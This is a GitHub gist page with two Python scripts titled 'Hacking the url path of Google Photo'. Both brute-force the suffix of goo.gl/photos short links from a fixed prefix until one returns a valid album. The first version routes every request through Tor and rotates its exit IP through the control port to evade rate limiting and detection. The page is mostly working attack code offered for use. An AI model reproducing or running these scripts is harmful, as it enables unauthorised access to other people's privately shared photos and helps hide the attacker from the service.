Last active
June 13, 2016 14:02
-
-
Save 6LYTH3/0fd3f16fe3ee28fc104ff3f5e3baa6e3 to your computer and use it in GitHub Desktop.
Hacking the url path of Google Photo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Author: Blythe LilYoojun | |
| Lib Require: socks and Tor proxy | |
| """ | |
| import socket | |
| import socks | |
| import requests | |
| import time | |
| ipcheck_url = 'http://checkip.amazonaws.com/' | |
| def connentTor(): | |
| socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050) | |
| socket.socket = socks.socksocket | |
| def getNewIP(): | |
| socks.setdefaultproxy() | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(("127.0.0.1", 9051)) | |
| s.send("AUTHENTICATE\r\n") | |
| r = s.recv(128) | |
| if r.startswith("250"): | |
| s.send("SIGNAL NEWNYM\r\n") | |
| s.close() | |
| connentTor() | |
| def finding(path): | |
| ip = (requests.get(ipcheck_url).text.split('\r')[0]).split('\n')[0] | |
| base = "https://goo.gl/photos/" | |
| prefix = 'G4ySSAc2hiKAzX' | |
| uri = base + prefix + path | |
| print "[-] Requestor: %s | %s" % (ip, uri) | |
| r = requests.get(uri) | |
| if r.status_code == 200: | |
| print "[!] %s" % (uri) | |
| return True | |
| def nextAlphabet(key): | |
| alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' | |
| index = alphabet.find(key) | |
| if index == len(alphabet) - 1: | |
| index = -1 | |
| key = alphabet[index + 1] | |
| return key | |
| def main(): | |
| s = 'aa9' | |
| p1 = 0 | |
| p2 = 0 | |
| while True: | |
| # Get New IP from Tor | |
| getNewIP() | |
| # Hacking | |
| if finding(s): | |
| break | |
| # Find at position number 2 | |
| if p2 != 62: | |
| s = s[0:1] + nextAlphabet(s[1]) + s[2:3] | |
| p2 = p2 + 1 | |
| if p2 == 62 and p1 != 62: | |
| s = nextAlphabet(s[0]) + s[1:3] | |
| p1 = p1 + 1 | |
| p2 = 0 # Reset | |
| if p1 == 62: | |
| break | |
| if __name__ == '__main__': | |
| connentTor() # Use random IP from Tor proxy | |
| main() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Author: Blythe LilYoojun | |
| Lib Require: socks and Tor proxy | |
| """ | |
| import socket | |
| import socks | |
| import requests | |
| import time | |
| def finding(path): | |
| base = "https://goo.gl/photos/" | |
| prefix = 'G4ySSAc2hiKAzX' | |
| uri = base + prefix + path | |
| r = requests.get(uri) | |
| print "[-] %s | %s" % (uri, r.status_code) | |
| if r.status_code == 200: | |
| print "[+] %s" % (uri) | |
| return True | |
| if r.status_code != 404: | |
| print '[!] Server Down' | |
| time.sleep(50) | |
| def nextAlphabet(key): | |
| alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' | |
| index = alphabet.find(key) | |
| if index == len(alphabet) - 1: | |
| index = -1 | |
| key = alphabet[index + 1] | |
| return key | |
| def main(): | |
| s = 'aa9' | |
| p1 = 0 | |
| p2 = 0 | |
| while True: | |
| # Hacking | |
| if finding(s): | |
| break | |
| # Find at position number 2 | |
| if p2 != 62: | |
| s = s[0:1] + nextAlphabet(s[1]) + s[2:3] | |
| p2 = p2 + 1 | |
| if p2 == 62 and p1 != 62: | |
| s = nextAlphabet(s[0]) + s[1:3] | |
| p1 = p1 + 1 | |
| p2 = 0 # Reset | |
| if p1 == 62: | |
| break | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment